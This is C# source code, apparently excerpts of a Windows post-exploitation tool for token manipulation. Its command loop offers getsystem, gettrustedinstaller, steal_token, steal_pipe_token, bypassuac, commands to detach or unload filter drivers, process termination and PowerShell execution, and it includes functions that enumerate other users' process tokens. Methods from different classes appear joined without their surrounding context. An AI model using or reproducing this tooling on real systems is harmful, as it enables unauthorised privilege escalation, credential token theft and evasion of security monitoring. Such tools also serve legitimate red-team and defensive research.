////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
public static void GetSystem(String input, IntPtr hToken)
{
CheckPrivileges.CheckTokenPrivilege(hToken, "SeDebugPrivilege", out Boolean exists, out Boolean enabled);
String item = NextItem(ref input);
if (exists)
{
if ("getsystem" == item)
{
using (Tokens t = new Tokens())
{
t.GetSystem();
}
}
else
{
using (Tokens t = new Tokens())
{
t.GetSystem(item + " " + input);
}
}
}
else
{
if ("getsystem" == item)
{
NamedPipes.GetSystem();
}
else
{
NamedPipes.GetSystem(input, item + " " + input);
}
}
}
////////////////////////////////////////////////////////////////////////////////
// Finds a process per user discovered
// ToDo: check if token is a primary token
////////////////////////////////////////////////////////////////////////////////
public static Dictionary <String, UInt32> EnumerateTokens(Boolean findElevation)
{
Dictionary <String, UInt32> users = new Dictionary <String, UInt32>();
foreach (Process p in Process.GetProcesses())
{
IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_QUERY_LIMITED_INFORMATION, true, (UInt32)p.Id);
if (IntPtr.Zero == hProcess)
{
continue;
}
IntPtr hToken;
if (!kernel32.OpenProcessToken(hProcess, (UInt32)Enums.ACCESS_MASK.MAXIMUM_ALLOWED, out hToken))
{
continue;
}
kernel32.CloseHandle(hProcess);
if (findElevation)
{
if (!CheckPrivileges.CheckElevation(hToken))
{
continue;
}
}
UInt32 dwLength = 0;
Winnt._TOKEN_STATISTICS tokenStatistics = new Winnt._TOKEN_STATISTICS();
//Split up impersonation and primary tokens
if (Winnt.TOKEN_TYPE.TokenImpersonation == tokenStatistics.TokenType)
{
continue;
}
if (!advapi32.GetTokenInformation(hToken, Enums._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
{
if (!advapi32.GetTokenInformation(hToken, Enums._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
{
Console.WriteLine("GetTokenInformation: {0}", Marshal.GetLastWin32Error());
continue;
}
}
kernel32.CloseHandle(hToken);
String userName = String.Empty;
if (!ConvertTokenStatisticsToUsername(tokenStatistics, ref userName))
{
continue;
}
if (!users.ContainsKey(userName))
{
users.Add(userName, (UInt32)p.Id);
}
}
return(users);
}
////////////////////////////////////////////////////////////////////////////////
// Find processes for a user via Tokens
////////////////////////////////////////////////////////////////////////////////
public static Dictionary <UInt32, String> EnumerateUserProcesses(Boolean findElevation, String userAccount)
{
Dictionary <UInt32, String> users = new Dictionary <UInt32, String>();
Process[] pids = Process.GetProcesses();
Console.WriteLine("[*] Examining {0} processes", pids.Length);
foreach (Process p in pids)
{
IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_QUERY_LIMITED_INFORMATION, true, (UInt32)p.Id);
if (IntPtr.Zero == hProcess)
{
continue;
}
IntPtr hToken;
if (!kernel32.OpenProcessToken(hProcess, (UInt32)Enums.ACCESS_MASK.MAXIMUM_ALLOWED, out hToken))
{
continue;
}
kernel32.CloseHandle(hProcess);
if (findElevation && !CheckPrivileges.CheckElevation(hToken))
{
continue;
}
UInt32 dwLength = 0;
Winnt._TOKEN_STATISTICS tokenStatistics = new Winnt._TOKEN_STATISTICS();
if (!advapi32.GetTokenInformation(hToken, Enums._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
{
if (!advapi32.GetTokenInformation(hToken, Enums._TOKEN_INFORMATION_CLASS.TokenStatistics, ref tokenStatistics, dwLength, out dwLength))
{
continue;
}
}
kernel32.CloseHandle(hToken);
if (Winnt.TOKEN_TYPE.TokenImpersonation == tokenStatistics.TokenType)
{
continue;
}
String userName = String.Empty;
if (!ConvertTokenStatisticsToUsername(tokenStatistics, ref userName))
{
continue;
}
if (userName.ToUpper() == userAccount.ToUpper())
{
users.Add((UInt32)p.Id, p.ProcessName);
if (findElevation)
{
return(users);
}
}
}
Console.WriteLine("[*] Discovered {0} processes", users.Count);
Dictionary <UInt32, String> sorted = new Dictionary <UInt32, String>();
foreach (var user in users.OrderBy(u => u.Value))
{
sorted.Add(user.Key, user.Value);
}
return(sorted);
}
internal void Run()
{
try
{
Console.Write(context);
String input;
if (activateTabs)
{
input = console.ReadLine();
}
else
{
input = Console.ReadLine();
}
IntPtr tempToken = IntPtr.Zero;
kernel32.OpenProcessToken(kernel32.GetCurrentProcess(), Constants.TOKEN_ALL_ACCESS, out IntPtr hToken);
switch (NextItem(ref input))
{
case "info":
if (GetProcessID(input, out processID, out command) && OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
Console.WriteLine("");
CheckPrivileges.GetTokenUser(hToken);
Console.WriteLine("");
CheckPrivileges.GetTokenOwner(hToken);
Console.WriteLine("");
CheckPrivileges.GetTokenGroups(hToken);
Console.WriteLine("");
CheckPrivileges.GetElevationType(hToken, out Winnt._TOKEN_TYPE tokenType);
CheckPrivileges.PrintElevation(hToken);
break;
case "list_privileges":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.EnumerateTokenPrivileges(hToken);
break;
case "enable_privilege":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
break;
case "disable_privilege":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
break;
case "remove_privilege":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.SetTokenPrivilege(ref hToken, command, Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
break;
case "nuke_privileges":
if (GetProcessID(input, out processID, out command))
{
if (OpenToken(processID, ref tempToken))
{
hToken = tempToken;
}
else
{
break;
}
}
Tokens.DisableAndRemoveAllTokenPrivileges(ref hToken);
break;
case "terminate":
if (GetProcessID(input, out processID, out command))
{
IntPtr hProcess = kernel32.OpenProcess(Constants.PROCESS_TERMINATE, false, (UInt32)processID);
if (IntPtr.Zero == hProcess)
{
Tokens.GetWin32Error("OpenProcess");
break;
}
Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
if (!kernel32.TerminateProcess(hProcess, 0))
{
Tokens.GetWin32Error("TerminateProcess");
break;
}
Console.WriteLine("[+] Process Terminated");
}
break;
case "sample_processes":
users = Enumeration.EnumerateTokens(false);
Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
foreach (String name in users.Keys)
{
Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName);
}
break;
case "sample_processes_wmi":
users = Enumeration.EnumerateTokensWMI();
Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
Console.WriteLine("{0,-40}{1,-20}{2}", "----", "----------", "------------");
foreach (String name in users.Keys)
{
Console.WriteLine("{0,-40}{1,-20}{2}", name, users[name], Process.GetProcessById((Int32)users[name]).ProcessName);
}
break;
case "find_user_processes":
processes = Enumeration.EnumerateUserProcesses(false, input);
Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
foreach (UInt32 pid in processes.Keys)
{
Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
}
break;
case "find_user_processes_wmi":
processes = Enumeration.EnumerateUserProcessesWMI(input);
Console.WriteLine("{0,-30}{1,-30}", "Process ID", "Process Name");
Console.WriteLine("{0,-30}{1,-30}", "----------", "------------");
foreach (UInt32 pid in processes.Keys)
{
Console.WriteLine("{0,-30}{1,-30}", pid, processes[pid]);
}
break;
case "list_filters":
using (Filters filters = new Filters())
{
filters.First();
filters.Next();
}
break;
case "list_filter_instances":
using (FilterInstance filterInstance = new FilterInstance(NextItem(ref input)))
{
filterInstance.First();
filterInstance.Next();
}
break;
case "detach_filter":
Filters.FilterDetach(input);
break;
case "unload_filter":
Filters.Unload(NextItem(ref input));
break;
case "sessions":
Enumeration.EnumerateInteractiveUserSessions();
break;
case "getsystem":
GetSystem(input, hToken);
break;
case "gettrustedinstaller":
GetTrustedInstaller(input);
break;
case "steal_token":
StealToken(input);
break;
case "steal_pipe_token":
StealPipeToken(input);
break;
case "bypassuac":
BypassUAC(input);
break;
case "whoami":
Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
break;
case "reverttoself":
String message = advapi32.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed";
Console.WriteLine(message);
break;
case "run":
Run(input);
break;
case "runpowershell":
RunPowerShell(input);
break;
case "exit":
Environment.Exit(0);
break;
case "help":
String item = NextItem(ref input);
if ("help" != item)
{
Help(item);
}
else
{
Help();
}
break;
default:
Help();
break;
}
if (IntPtr.Zero != hToken)
{
kernel32.CloseHandle(hToken);
}
Console.WriteLine();
}
catch (Exception error)
{
Console.WriteLine(error.ToString());
Tokens.GetWin32Error("MainLoop");
}
finally
{
}
}